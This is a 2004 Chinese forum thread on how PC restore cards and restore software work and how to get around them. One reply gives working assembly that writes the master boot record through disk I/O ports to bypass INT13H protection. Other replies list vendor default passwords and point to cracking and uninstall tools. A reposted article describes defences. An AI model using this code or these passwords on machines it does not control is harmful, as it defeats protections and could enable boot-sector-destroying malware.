首页
社区
课程
招聘
请教还原卡的原理(请看内容,因为这不是破解请求)
发表于: 2004-10-20 16:08 26958

请教还原卡的原理(请看内容,因为这不是破解请求)

2004-10-20 16:08
26958
最近,需要在机房内安装新软件,以便教学,但是机器都插有还原卡,装了等于白装,一个重新启动就都完了,由于没出保修期,而且我又没有资格开机箱,是否就没办法了?
   所以想问一下,还原卡是否也有超级用户名?如果没有,是不是就只有拔掉卡一个途径?
   从哲学上讲应该可以能够查看到密码的吧?(估计够难的哈),而且,如果破解了的话,是不是卡就被损坏了?俺是菜鸟,实在是不懂。
   希望各位大侠,路过能够给我指点一下,起码,我也知道知道还原卡的原理,也算有所收获了。
   ……
   因为我菜,也根本不知道卡的品牌。:(
……

谢谢,大家了,
(如果斑竹觉得这个帖子违规,那么就请删除,但是请别删除我的id,谢谢)

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 1
支持
分享
最新回复 (43)
雪    币: 237
活跃值: (175)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
2
我当年管理学校院里的机房时用过还原卡,我想一般情况你也应该知道吧,还原卡没有必要设置超级口令的,因为会提供一个程序清除还原卡密码的。
你既然没有权利开机箱的话,就由管理员来处理。
2004-10-20 16:19
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
最初由 GoOdLeiSuRe 发布
我当年管理学校院里的机房时用过还原卡,我想一般情况你也应该知道吧,还原卡没有必要设置超级口令的,因为会提供一个程序清除还原卡密码的。
你既然没有权利开机箱的话,就由管理员来处理。

唉,问题是就没有管理员啊,公司配完机子就没了,然后,使用归我。
2004-10-20 19:33
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
4
风般的男人可以搞定。

CVC/GB  风般的男人
还原卡和还原软件被广泛运用于各种公共场合的电脑上,比如学校机房和网吧。这些还原卡和还原软件(以下我简称为虚拟还原技术)能够记录下一切对硬盘的写操作,不论您对硬盘进行拷贝还是移动删除甚至是格式化分区等操作,只要一重新启动,一切都会恢复到这个操作之前的情况,因此有些虚拟还原厂商还会在广告词中加上一句“可以防范一切电脑病毒”。这种虚拟还原的方法在大部分时候的确可以对公共机房的电脑起到很好的保护作用,难道真的没有一种方法能够穿透这种保护机制么?答案是否定的,下面请听我一一道来。
一、虚拟还原技术的原理
本文所说的是一种普遍运用于还原卡或还原软件上的技术,当然,不同品牌不同厂商生产的可能不尽相同,但原理却是相通的。
首先,还原卡和还原软件会抢先夺取引导权,将原来的0头0道1扇保存在一个其他的扇区,(具体备份到那个扇区是不一定的),将自己的代码写入0头0道1扇,从而能在操作系统之前得到执行权,这一点类似于一个引导型病毒;然后,我们来看看虚拟还原技术在操作系统之前都做了些什么:
1.将中断向量表中的INT13H的入口地址保存;
2.把自己用于代替INT13H的代码写入内存,并记住入口地址,当然这种“写入内存”并不是普通的“写”,而是一种我们称为“常驻”的方法,有关“常驻程序”的实现方法我们不另外花篇幅来描述了,如果你还不了解的话请自己找有关资料,也可以www.hackart.orgwww.lsky.net找风般的男人交流;
3.将中断向量表中INT13H的入口地址改为这段常驻程序的入口地址。补充一点,虚拟还原程序在修改INT13H的入口后往往都会修改一些其他中断入口,当然也是通过常驻程序来实现的,这些中断用来实现对中断向量表中INT13H入口地址监控,一旦发现被修改,就马上把它改回,这样做同样是用来防止被有心人破解。
好了,你已经看出来了,这段用来替代BIOS提供的INT13H的代码才是虚拟还原技术的关键,那么这段代码到底实现了些什么了,以下是本人对此拙浅的理解:
1.拦截所有INT13H中对硬盘0头0道1扇的操作
这些包括读写操作,把所有的对0头0道1扇的操作改为对虚拟还原程序备份的那个扇区的操作,这样做的目的是保护虚拟还原代码不被破坏,并且不能被有心人读出进行破解,即使你用扇区编辑工具查看主引导区,实际上你看到的是这个备份的主引导区。
2.拦截所有INT13H中的写硬盘操作
这里包括对8G以下的硬盘的普通通过磁头、磁道、扇区定位的INT13H中的写操作,和扩展INT13H中基于扇区地址方式的对大硬盘的写操作,甚至包括扩展INT13H中对一些非IDE接口的硬盘的写操作。
至于拦截后做什么是虚拟还原技术实现的关键,在早期的DOS系统当中完全可以“什么都不做”,也就是说当用户写硬盘时实际上是什么都没做,但现在的操作系统都要对硬盘进行一些必要的写操作,比如对虚拟内存的写操作。众所周知,虚拟内存实际上就是硬盘,而如果禁止操作系统写硬盘的话显然后果是不堪设想的。所以,大多数虚拟还原厂商用的方法是占用一些硬盘空间,把硬盘所进行的写操作做一个记录,等系统重新启动后还原这一记录,但是怎样科学记录硬盘的写操作,是我一直没想通的问题,这种“科学”应该体现在时间上和硬盘空间的占用量上的,也就是说怎么样用最少的时间和最少的硬盘空间来记录硬盘的写操作是实现关键,如果有这方面想法的朋友欢迎和我交流;
3.备份端口70H,71H中的内容,并把最后一次执行时端口70H,71H的内容和备份的内容做比较,不一样就提示BIOS被修改,是否还原,并通过密码验证修改BIOS是否合法。 二、PC机的中断机制
中断提供了最基本的硬件和软件的接口,它使得程序员不必了解硬件系统的细节,只要直接调用系统提供的中断服务子程序,就可以完成相应功能,这样能使得程序设计更为方便。其实现机制如下:当某一中断源发出中断请求时,CPU能够决定是否响应这一中断请求(当CPU在执行更为重要的工作时,可以暂不响应),如果允许响应该中断,CPU会在现行的指令执行完后,把断点处的下一条指令地址和各寄存器的内容和标志位的状态,推入堆栈进行保护,然后转到中断源服务程序的入口,进行中断处理,当中断处理完成后,再恢复被保留的各寄存器、标志位状态和指令指针,使CPU返回断点,继续执行下一条指令。
为了区别各个中断,CPC系统给每个中断都分配了一个中断号N,比如INT 3H是断点中断,INT 10H是显示中断,我们今天要讨论的主要是INT 13H磁盘读写中断。
要说清楚PC机上的中断机制,用这一点篇幅是完全不够的,这里我所说的只是一个大概,如果你不清楚的话,请查阅一些资料或和我交流,我们今天重要要说的就是以INT13H为例看看BIOS提供给我们的中断到底都是在做什么?所谓BIOS中断简单说就是你机器上的BIOS提供的中断,那么在BIOS中断的后面,到底是些什么呢?实际上是一些对端口的输入输出操作,PC的每个端口都实现特定的功能,我们完全可以不调用BIOS提供的中断而直接用输入输出指令对这些端口进行操作,从而可以实现象调用BIOS中断一样的功能,但是一个前提是你必须对这些端口有详细的了解。反过来说,PC的中断系统的一大好处就是能够让程序员无须了解系统底层的硬件知识的而能够编程,从这点看,中断有点象我们平时所说的“封装”,我不知道这样说对不对,但的确中断为我们“封装”了许多系统底层的细节。 三、硬盘读写端口的具体含义
   对硬盘进行操作的常用端口是1f0h~1f7h号端口,各端口含义如下:
端口号     读还是写   具体含义
1F0H       读/写      用来传送读/写的数据(其内容是正在传输的一个字节的数据)
1F1H       读         用来读取错误码
1F2H       读/写      用来放入要读写的扇区数量
1F3H       读/写      用来放入要读写的扇区号码
1F4H       读/写      用来存放读写柱面的低8位字节
1F5H       读/写      用来存放读写柱面的高2位字节(其高6位恒为0)
1F6H       读/写      用来存放要读/写的磁盘号及磁头号
                     第7位     恒为1
                     第6位     恒为0
                     第5位     恒为1
                     第4位     为0代表第一块硬盘、为1代表第二块硬盘
                     第3~0位    用来存放要读/写的磁头号
1f7H       读         用来存放读操作后的状态
                     第7位     控制器忙碌
                     第6位     磁盘驱动器准备好了
                     第5位     写入错误
                     第4位     搜索完成
                     第3位     为1时扇区缓冲区没有准备好
                     第2位     是否正确读取磁盘数据
                     第1位     磁盘每转一周将此位设为1,
                     第0位     之前的命令因发生错误而结束
          写         该位端口为命令端口,用来发出指定命令
                     为50h     格式化磁道
                     为20h     尝试读取扇区
                     为21h     无须验证扇区是否准备好而直接读扇区
                     为22h     尝试读取长扇区(用于早期的硬盘,每扇可能不是512字节,而是128字节到1024之间的值)
                     为23h     无须验证扇区是否准备好而直接读长扇区
                     为30h     尝试写扇区
                     为31h     无须验证扇区是否准备好而直接写扇区
                     为32h     尝试写长扇区
                     为33h     无须验证扇区是否准备好而直接写长扇区
注:当然看完这个表你会发现,这种读写端口的方法其实是基于磁头、柱面、扇区的硬盘读写方法,不过大于8G的硬盘的读写方法也是通过端口1F0H~1F7H来实现的^_^
四、一个通过对硬盘输入输出端口操作来读写硬盘的实例
让我们来看一个关于INT13H读写硬盘程序实例。在例子中详细说明了硬盘的读写操作所用到的端口,并且把通过INT13H读出的主引导区得到的数据和通过输入输出读主引导区得到的数据进行比较,从而证实这两种操作功能相同,程序片段如下: mov     dx,1f6h         ; 要读入的磁盘号及磁头号
mov     al,0a0h         ;磁盘0,磁头0   
out      dx,al

mov     dx,1f2h         ;要读入的扇区数量
mov     al,1            ;读一个扇区   
out      dx,al

mov     dx,1f3h         ;要读的扇区号
mov     al,1            ;扇区号为1
out      dx,al

mov     dx,1f4h         ;要读的柱面的低8位
mov     al,0            ; 柱面低8位为0
out     dx,al

mov     dx,1f5h         ; 柱面高2位  
mov     al,0            ; 柱面高2位为0(通过1F4H和1F5H端口我们可以确定
; 用来读的柱面号是0)
out      dx,al

mov     dx,1f7h         ;命令端口
mov     al,20h          ; 尝试读取扇区
out      dx,al
still_going:
in      al,dx
test     al,8            ;扇区缓冲是否准备好
jz     still_going     ;如果扇区缓冲没有准备好的话则跳转,直到准备好才向下执行。

mov     cx,512/2        ;设置循环次数(512/2次)
mov     di,offset buffer
mov     dx,1f0h         ;将要传输的一个字节的数据
rep      insw            ;传输数据

;   ------

mov     ax,201h         ;以下是用INT13H读硬盘的0磁头、0柱面、1扇区
mov     dx,80h
mov     cx,1
mov     bx,offset buffer2
int       13h

mov     cx,512         ;以下部分用来比较2种方法读出的硬盘数据
mov     si,offset buffer
mov     di,offset buffer2
repe     cmpsb
jne      failure
mov     ah,9
mov     dx,offset readmsg
int      21h
jmp     good_exit
failure:
mov     ah,9
mov     dx,offset failmsg
int       21h
good_exit:              ;以下部分用来结束程序
mov      ax,4c00h        ;退出程序
int      21h

readmsg db      'The buffers match.  Hard disk read using ports.$'
failmsg db      'The buffers do not match.$'
buffer  db      512 dup ('V')
buffer2 db      512 dup ('L') 五、可以穿透还原卡或是还原软件保护的代码
你可以对照硬盘读写端口含义表,再好好看看上面的例子,你将会对硬盘读写端口有一个比较深的理解。好了,到了该把谜底揭晓的时候了,重新回到我们的主题。正如你现在想象的,这种可以穿透还原卡或是还原软件保护的代码的确是对硬盘读写端口的输入输出操作。现在,我们已经可以从原理上理解了,还原卡拦截的是中断操作,但却拦截不了输入输出操作,而用输入输出操作足够可以对硬盘进行写操作了,当然用输入输出操作也完全可以读到被虚拟还原程序屏蔽的关键部分,被还原卡或是还原软件屏蔽的0头0道1扇。知道了这一原理以后,可能是仁者见仁智者见智的,如果你是一个虚拟还原技术的破解者、一个病毒制造者,或是虚拟还原技术的设计者,往往对此的理解都是不尽相同的。
在此强调我不赞成制造病毒,但一个病毒制造者完全可以用此原理写出一个可以实现破坏装有还原卡或还原软件的机器了,所以我要提醒虚拟还原用户的是,不要以为装有还原卡或是还原软件就掉以轻心,要知道世界上还是有病毒能够穿透虚拟还原技术的保护,达到破坏硬盘的目的的,想象一下如果把这一原理运用到CIH病毒中,或者运用到硬盘杀手病毒中,其后果是不堪设想的。
谈谈如何用这种可以穿透虚拟还原技术的代码来破解还原软件(如还原精灵)吧。以下是我写的用来测试破解还原精灵的代码,本代码编译后的程序需要在纯DOS环境执行,在DOS下我用这段代码成功的把还原精灵给卸载了。
.286
CODE SEGMENT
    ASSUME CS:CODE,DS:code,ES:code
START:
;----------------------------------------------------------
;以下代码用INT13H读主引导区
mov     ax,0201h
mov     dx,0080h
mov     cx,0001h
mov     bx,7c00h
int      13h
;---------------------------------------------------------
;以下代码用I/O端口来写主引导区
mov     dx,1f6h         ; 要读入的磁盘号及磁头号
mov     al,0a0h         ; 磁盘0,磁头0
out      dx,al

mov     dx,1f2h         ; 要写的扇区数量
mov     al,1            ; 写一个扇区
out      dx,al

mov     dx,1f3h         ;要写的扇区号
mov     al,1            ;写到1扇区
out      dx,al

mov     dx,1f4h         ; 要写的柱面的低8位
mov     al,0            ; 低8位为0
out      dx,al

mov     dx,1f5h         ; 要写的柱面的高2位
mov     al,0            ; 高2位为0
out      dx,al

mov     dx,1f7h         ;命令端口
mov     al,30h          ;尝试着写扇区.
out      dx,al
oogle:
in       al,dx
test      al,8            ;磁盘扇区缓冲是否准备好
jz       oogle

mov     cx,512/2        ;设置循环次数(512/2)
mov     si,7c00h
mov     dx,1f0h         ;数据端口,用来存放要发送的数据.
rep      outsw           ;发送数据.
; ------------------------------------------------------------------------------
;退出程序
mov     ah,4ch
int       21
CODE ENDS
    END START
上面的程序非常简单,说明如下:
1、先把被还原精灵备份的原来的主引导区用INT13H读出来,这里虽然是对0头0道1扇进行读操作,但实际上是在读被还原精灵把原来的主引导区备份进去的那个扇区;
2、把读出的原来的主引导区通过输入输出操作写进真正的主引导区,换句话说就是把还原精灵给彻底删除了,此时重新启动你将发现还原精灵已经没有了。
我写了个FORWIN98/NT/XP的卸载还原精灵等软件的程序,大家可到www.lsky.net下载。
用以上的方法要实现还原卡的破解可能是不行的,因为还原卡毕竟是硬件,它可以先于硬盘引导前执行,这样即使你写回了硬盘的主引导区,还原卡还是可以把它写回的,但是,在破解还原卡的时候,完全可以利用文章中的原理,把还原卡写入硬盘主引导区的真正代码读出进行分析,甚至有些还原卡的密码就在这个扇区中。
   对于还原卡和还原软件的制造者来说,如何让您制造的还原卡或还原软件更安全,可能是一个需要思考的问题。真心希望以后的还原卡或是还原软件在拦截INT13H的同时也能拦截硬盘I/O操作。
在我安装还原精灵的时候看到一个选项是“防止硬盘I/O破坏”,开始还以为还原精灵在这方面做的不错,想到了从拦截I/O操作来保护硬盘。可惜我错了,即使选择这一个选项,也同样可以通过输入输出端口操作来写硬盘。对于掌握了这种技术的人来说,这种还原卡或是还原软件可以说是形同虚设。因此我认为,还原卡和还原软件不但要实现拦截所有硬盘写操作、拦截对主引导区的读写操作,更应该拦截对硬盘的读写端口的操作,只有这样的虚拟还原技术才可能使基于硬盘的读写端口操作所对硬盘的破坏或是对虚拟还原技术的破解变成不可能。
2004-10-20 21:26
0
雪    币: 97697
活跃值: (200839)
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
5
最初由 nbw 发布
风般的男人可以搞定。

CVC/GB 风般的男人
还原卡和还原软件被广泛运用于各种公共场合的电脑上,比如学校机房和网吧。这些还原卡和还原软件(以下我简称为虚拟还原技术)能够记录下一切对硬盘的写操作,不论您对硬盘进行拷贝还是移动删除甚至是格式化分区等操作,只要一重新启动,一切都会恢复到这个操作之前的情况,因此有些虚拟还原厂商还会在广告词中加上一句“可以防范一切电脑病毒”。这种虚拟还原的方法在大部分时候的确可以对公共机房的电脑起到很好的保护作用,难道真的没有一种方法能够穿透这种保护机制么?答案是否定的,下面请听我一一道来。
一、虚拟还原技术的原理
........

谢谢!!!不诚相识,继往开来!!!
论坛希望你的支持!!!
2004-10-20 21:28
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
先谢谢楼上的兄弟们了,
我也google到了这篇文章,但是它是卸载,我希望是能发现密码而不要卸载,
而且,再请教一下,硬还原卡卸载了后,是不是只要从主板上拔掉,重启后就会自动提示设置密码啊之类的操作呢?
我只用过还原精灵,卸载后还是需要重新安装的,所以,想知道,硬还原卡重新安装的时候是否也得要软盘啊,光盘啊,什么的。
2004-10-21 00:43
0
雪    币: 237
活跃值: (175)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
7
如果归你管的话,打个电话给电脑公司,他们会帮你开机箱的。
2004-10-21 12:19
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
最初由 GoOdLeiSuRe 发布
如果归你管的话,打个电话给电脑公司,他们会帮你开机箱的。

嗯,经典,
工作了以后发现比官僚主义还难缠的是民僚主义,最终就挤兑成我一个人了,唉,谁让咱是小弟呢
2004-10-21 13:07
0
雪    币: 413
活跃值: (637)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
9
你用的是什么的还原卡,说说,如果工作在最低层,或许我可以帮参谋一下.
2004-10-21 14:45
0
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
最初由 冬瓜汤 发布
先谢谢楼上的兄弟们了,
我也google到了这篇文章,但是它是卸载,我希望是能发现密码而不要卸载,
而且,再请教一下,硬还原卡卸载了后,是不是只要从主板上拔掉,重启后就会自动提示设置密码啊之类的操作呢?
我只用过还原精灵,卸载后还是需要重新安装的,所以,想知道,硬还原卡重新安装的时候是否也得要软盘啊,光盘啊,什么的。


硬还原卡卸载了后,一切正常。但没卸载,直接拔掉,会有提示。
在同一台机器重装保护卡不需要盘。
我只知道两个还原卡的出厂password
三茗:12345678
华超:19971998
2004-10-21 17:15
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
最初由 nig 发布
你用的是什么的还原卡,说说,如果工作在最低层,或许我可以帮参谋一下.

谢谢你,我看了半天,也没找到它的商标,找到了就发上来,感觉还是网上好啊。
唉,工作了才发现想要做一点点事情是多难,觉得现在的我比在学校的时候宽容多了,感觉自己也世故多了,……
2004-10-21 20:11
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
最初由 ciywind 发布


硬还原卡卸载了后,一切正常。但没卸载,直接拔掉,会有提示。
在同一台机器重装保护卡不需要盘。
我只知道两个还原卡的出厂password
........

谢谢你!

12345678我曾经试过了,不行,我再试试其它,唉,我菜得连人家的logo都没找见。(这公司也是,怎么进入还原卡界面都不显示一个logo捏?)
2004-10-21 20:13
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
还原卡第一次插在主板上,开机就会显示一个安装界面。里面有一个
选项"开机时启动画面" 一般管理员都会设置成"无,不显示"。
然后再设置好密码和保护的盘子,这样还原卡就安装到了机子里。
当你每次启动机子到进入操作系统,就不会显示还原卡的界面,这样你
根本就不知道是否安装了还原卡。只有进入了操作系统后,先检查是否
安装了还原精灵之类的软件,如果没有,就对硬盘进行一些读写操作
然后重启,看数据是否保存。如果没有,那么确信无疑安装了还原卡。
这个时候,就想怎样去破解还原卡了。
一般来说,破解还原卡有两种方法:一种麻烦,另一种不麻烦。
先说麻烦的,如果你是管理员,直接光明正大的打开机箱,拔出还原卡。
再到该还原卡的网站去下载一个密码清除器,到dos下清除就可以了。
举个例子:华苏还原卡的网站www.hasu.com.cn上就可以下载一个
密码清除程序,专门用来卸载华苏还原卡(但是先要拆机箱把卡拔下)。
如果不用拔卡的话,那他就是搬起砖头砸自己的脚了,估计一块卡也
卖不出了,嘿嘿!所以说这种方法比较麻烦。
另一种不麻烦的,aogo的斑竹天杀写了一个还原卡破解的源代码
在www.aogosoft.com的论坛的精华贴有下载。它可以在不拔卡的情况下,
读出还原卡的密码,可惜只能在win98下。
有了密码以后,还要知道还原卡的呼出方法。
华苏 f10
蓝沙 home
小哨兵 ctrl+f1
另外说明一点,只要拔下还原卡或让机子检测不到还原卡,不管其是否卸载,
硬盘都处于非保护状态,你想干什么就能干什么。
基于以上一点,对机箱施以打击,振动都可以使机子检测不到还原卡,从而达
到与卸载一样的效果。(本人极力反对这种不道德的行为)。说到这里,让我想起
了有一次去网吧上网,开机内存条报警,我正准备换机。这时网管过来了,
只见他拖出机箱,拔掉电源线,再对着机箱狠踢两脚,接上电源线,把机箱放回

原地,开机滴的一声正常启动,然后扬长而去。我当时就晕了,居然有这种网管,

真是让人哭笑不得啊!
2004-10-21 20:53
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
好楼上的兄弟,我下载去!
谢谢
2004-10-21 21:36
0
雪    币: 413
活跃值: (637)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
15
真高明!知道这样,你帮他来几脚好了。呵呵!
2004-10-21 21:44
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
最初由 nig 发布
真高明!知道这样,你帮他来几脚好了。呵呵!

呵呵,要是这么几脚下去估计俺的饭碗也就丢了,:p
2004-10-21 21:45
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
各位大侠,
上面推荐的工具我都试过了,提示不是“华苏”“小哨兵”的还原卡,
进入管理模式的时候需要键入ctrl+enter,这个应该是啥牌子的?
呵呵,再次谢谢大家了。
2004-10-26 19:11
0
雪    币: 241
活跃值: (160)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
好多牛人哦:)
2004-10-26 21:47
0
雪    币: 413
活跃值: (637)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
19
newclass 的卡吧.    你试一下,开机后按CTRL+H  或CTRL+N 看有无反应,  功能键有F10  Enter
2004-10-27 06:58
0
雪    币: 318
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
好东东,长了不少知识
谢谢各位老大!!!
2004-10-27 09:24
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
一般来说,还原卡都自带有一个网络克隆的功能(有的卡需要安装一个软件,如华苏).这个网络克隆就是一台机子做发送机,其余的机子做接收机。然后将发送机上选择发送的盘子或文件,拷贝到其他接收机上。但是,它还有一个特性:那就是在拷贝文件的同时把发送机上的还原卡的设置也拷贝了过去。也就是说,
你先在发送机上安装好还原卡,设置密码为12345678,然后网络克隆到其他机子。克隆结束后,每台机子还原卡的密码都变成了12345678。
如果你能再弄到一块和你机房的机子一样的还原卡(没安装过的)。这个方法或许对你有用。
2004-10-29 11:40
0
雪    币: 427
活跃值: (412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
22
万能密码
2004-10-29 13:11
0
雪    币: 205
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
23
我们机房也是
不过有几台坏了
2004-10-29 19:17
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
24
(转载) 原文地址:http://www.lancard.com.cn/wangguan/jingxuan.htm
硬盘保护卡安全漏洞及解决办法

《中国电脑教育报》崔永明  出版日期:2003-03-10 总期号:508 本年期号:08

--------------------------------------------------------------------------------
   
  
  硬盘保护卡在学校的机房管理中占有很重要的地位,基本上达到了“一卡无忧”的目标。但是随着互联网技术的发展,特别是针对破解保护卡的文章不时在网上出现,有了保护卡就可以高枕无忧的想法就不再现实了,保护卡的安全性面临着新的考验。

  怎样防止保护卡被破解呢?这就得从保护卡的原理谈起了。保护卡的工作原理简单来讲就是它接管对硬盘进行读写操作的一个INT13中断,保护卡在系统启动的时候首先用它自己的程序接管INT13中断地址。这样,只要是对硬盘的读写操作都要经过保护卡的保护程序进行保护性的读写,也就是先将FAT文件分配表、硬盘主引导区、CMOS信息、中断向量表等信息都保存到保护卡内的临时储存单元中。用来应付我们对硬盘内数据的修改。每当我们向硬盘写入数据时,其实还是完成了写入到硬盘的操作,可是没有真正修改硬盘中的FAT。而是写到了备份的FAT表中,这就是为什么系统重启后所有写操作一无所有的原因了。这也就是硬盘保护卡的主要工作原理。

  了解了保护卡的工作原理,我们就知道了破解保护卡的核心问题就是对系统启动后INT13的控制权问题和保护卡的管理员密码的问题。所以对保护卡安全威胁来自于以下两种方式的攻击:
  针对保护卡管理员密码的攻击一般有三种手段;

  1. 利用默认密码的攻击。一般的保护卡都有一个默认密码,这些默认密码都很简单。所以针对这种攻击的防护就是一定要修改管理员密码。

  2. 利用保护卡的万能密码的攻击。一般保护卡都有自己的万能密码,根据保护卡的型号、批次、类型的不同而不同,厂商也许考虑到管理者遇到密码遗失问题而设了这个后门。但在网上的确可以找到这种万能密码。所以这种破解也是很危险的。遇到这种问题我们只有寄希望于保护卡厂家的版本升级了。

  3. 针对存在于硬盘主引导区的保护卡密码的直接攻击。这就不是我们用户能解决的问题了,而是保护卡厂方的责任与义务。

  针对INT13的控制权的攻击

  其实只要有简单的计算机知识的人在一分钟内就可以破解,就如破解CMOS的密码一样简单。这里只是把他们的破解工具主要方法简要说明一下。DEBUG就是他们的利器,一般方法是利用四五条汇编语言就可很轻松地修改INT13的中断入口,使保护卡不起保护作用了。我个人了解到的解决办法如下:

  1. 一般来讲这种攻击是在DOS方式或Windows 98的命令行方式下进行的,所以怎么样禁止DOS命令方式是解决该问题的关键。最好的办法就是把Windows 98系统平台改为Windows 2000平台,在这种平台下DOS攻击方式是没有用武之地的。

  2. 如果仍然还是用Windows 98平台,也有解决这种攻击的方法,利用魔法兔子98或魔法兔子2000对注册表进行修改,禁用DOS命令方式与DOS实模式,禁用启动时的F8、F4功能,禁用开始菜单中的执行与关机功能(可以在桌面上建一个关机的快捷图标来关机)。删除Debug.exe文件(尽可能在Windows 98的安装包中把这个文件也给删除后再压缩,以防从压缩包中重新释放)。尽可能地把FAT16文件格式转换为FAT32文件格式。CMOS的优先启动顺序最好是第一为LAN,第二为C,千万不要把A盘设计第一启动顺序。保护卡一定要保护CMOS。

  技术的防范是有限的,我个人总结最好的办法就是随时与学生交流,引导他们正确学习、使用技术。
2004-10-29 19:19
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
25
如果是newclass的新卡可下载这个程序:
URL=bbs.pediy.com/upload/file/2004/10/kill.rar_674.rar]附件:kill.rar[/URL] 附件:kill.rar
在纯dos下运行后可卸载。
重起后有安装提示,可到www.newclass.org下载相应的驱动安装即可。
2004-10-30 13:06
0
游客
登录 | 注册 方可回帖
返回
//